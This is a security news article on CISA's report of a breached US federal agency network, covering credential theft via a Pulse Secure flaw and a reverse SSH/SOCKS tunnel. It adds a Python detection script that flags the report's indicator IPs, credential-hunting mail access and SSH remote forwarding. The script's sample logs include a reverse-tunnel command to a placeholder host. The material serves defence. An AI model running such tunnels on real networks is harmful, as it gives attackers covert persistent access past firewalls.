The Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor breached a US federal agency's enterprise network and exfiltrated data.
CISA published a detailed analysis report on the incident but didn't disclose the name of the hacked agency. The threat actor implanted malware on the unnamed agency's network that was able to evade the agency's anti-malware protection.
“The Cybersecurity and Infrastructure Security Agency (CISA) responded to a recent threat actor’s cyberattack on a federal agency’s enterprise network.” reads the analysis report published by CISA. “By leveraging compromised credentials, the cyber threat actor implanted sophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in the agency’s firewall.”
The intrusion was detected by EINSTEIN, CISA's intrusion detection system used to monitor federal civilian networks.
The threat actors initially leveraged compromised credentials for Microsoft Office 365 (O365) accounts, domain administrator accounts, and credentials for the agency’s Pulse Secure VPN server.
“First the threat actor logged into a user’s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from Information Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization’s virtual private network (VPN) server (Exploit Public-Facing Application [T1190]).” continues the report.
CISA analysts believe the attackers may have obtained the credentials from an unpatched agency VPN server by exploiting CVE-2019-11510, a known Pulse Secure VPN vulnerability that allows an unauthenticated attacker to read arbitrary files, including cached credentials, from the appliance.
Once logged into the Office 365 accounts, the attackers attempted to view and download help desk email attachments with "Intranet access" and "VPN passwords" in the subject line, in order to gather additional information on the target network. They also enumerated Active Directory and Group Policy objects and changed a Group Policy registry key.
To establish persistence and command and control on the agency's network, the attackers created a persistent Secure Shell (SSH) tunnel/reverse SOCKS proxy. Because such a tunnel is initiated from inside the network, it passes through firewall rules that only restrict inbound connections, which is how the actor gained the persistent access described in the report.
The intruders connected an attacker-controlled hard drive to the agency's network as a locally mounted remote share.
“The mounted file share allowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,” the report continues.
The attacker created a local account on the network and used it to browse the local network, run PowerShell commands, and collect data into compressed ZIP archives containing several files and directories. CISA couldn't confirm whether the attacker exfiltrated these ZIP archives.
According to CISA, the malware was able to overcome the agency's anti-malware protection: the dropped binary, inetinfo.exe, escaped quarantine. The name is shared with the legitimate Microsoft IIS process, which complicates detection by filename alone.
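The attack chain above (logins from the two IP addresses named in the report, help desk mailbox searches for "Intranet access" and "VPN passwords", and the persistent SSH reverse tunnel) can be turned into simple detection logic. The following is an added example written for this page, not code from the CISA report or from SecurityAffairs. Only the two IP addresses and the two subject keywords come from the report; the key=value log format, the sample records, the host names, the user names, the 203.0.113.9 tunnel endpoint and the rule that flags an `ssh -R` command line are all constructed assumptions for illustration.

```python
"""Detection logic for the TTPs described in CISA's report on the agency intrusion.

Added example, not part of the CISA report or the SecurityAffairs article.
Only IOC_IPS and SUBJECT_KEYWORDS come from the report; everything else
(log format, sample records, hosts, users, tunnel endpoint) is constructed.
"""
import re
from dataclasses import dataclass

# Indicators quoted in the report (the article defangs them as 91.219.236[.]166 etc.)
IOC_IPS = {"91.219.236.166", "185.86.151.223"}
# Subject-line keywords the actor searched help desk mail for
SUBJECT_KEYWORDS = ("intranet access", "vpn passwords")
# Assumption: an SSH client invoked with remote forwarding (-R) on a server host
# is a reasonable signal for a reverse tunnel / reverse SOCKS proxy. The report
# does not give the actor's actual command line.
REVERSE_SSH_RE = re.compile(r"(^|[\\/\s])ssh(\.exe)?\s.*\s-R\s", re.IGNORECASE)

# Constructed sample events, one key=value record per line (assumed format).
SAMPLE_LOGS = """\
type=vpn_auth src=185.86.151[.]223 user=jdoe result=success
type=vpn_auth src=10.0.4.12 user=asmith result=success
type=o365_mail op=MailItemsAccessed user=jdoe@agency.example src=91.219.236.166 subject="RE: VPN passwords for new hires"
type=o365_mail op=MailItemsAccessed user=jdoe@agency.example src=91.219.236.166 subject="Intranet access request"
type=o365_mail op=MailItemsAccessed user=asmith@agency.example src=10.0.4.12 subject="Lunch menu"
type=process host=fileserver01 user=SYSTEM cmd="ssh.exe -fN -R 1080 svc@203.0.113.9"
type=process host=ws42 user=asmith cmd="notepad.exe"
"""


@dataclass
class Finding:
    rule: str
    line_no: int
    detail: str


def refang(ip: str) -> str:
    """Turn a defanged address such as 91.219.236[.]166 back into a real one."""
    return ip.replace("[.]", ".")


def parse_line(line: str) -> dict:
    """Parse key=value pairs; values may be double-quoted to allow spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def detect(log_text: str) -> list:
    """Run the three rules over every record and return the findings."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if not rec:
            continue
        src = refang(rec.get("src", ""))
        # Rule 1: any event sourced from an IP named in the report
        if src in IOC_IPS:
            findings.append(Finding("ioc_source_ip", n,
                                    f"{rec.get('type')} from {src} user={rec.get('user')}"))
        # Rule 2: mailbox access touching credential-bearing help desk threads
        if rec.get("type") == "o365_mail":
            subject = rec.get("subject", "").lower()
            if any(k in subject for k in SUBJECT_KEYWORDS):
                findings.append(Finding("helpdesk_credential_mail", n,
                                        f"{rec.get('user')} accessed '{rec.get('subject')}'"))
        # Rule 3: SSH remote port forwarding launched on an internal host (assumed signal)
        if rec.get("type") == "process" and REVERSE_SSH_RE.search(rec.get("cmd", "")):
            findings.append(Finding("reverse_ssh_tunnel", n,
                                    f"{rec.get('host')}: {rec.get('cmd')}"))
    return findings


def summarize(findings: list) -> dict:
    """Count findings per rule, e.g. {'ioc_source_ip': 3, ...}."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_LOGS):
        print(f"line {f.line_no}: [{f.rule}] {f.detail}")
    print(summarize(detect(SAMPLE_LOGS)))
```

Rule 1 is the only one that is purely indicator-based and will go stale as the actor changes infrastructure; rules 2 and 3 target the behaviour (credential hunting in mail and outbound SSH with remote forwarding) and are the ones worth keeping after the IoCs age out. In a real deployment the `-R` rule should also be correlated with the destination address leaving the network, since administrators do legitimately use SSH forwarding internally.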
Additional technical details, including Indicators of Compromise (IoCs) are included in the Analysis Report published by CISA.
(SecurityAffairs – hacking, federal agency)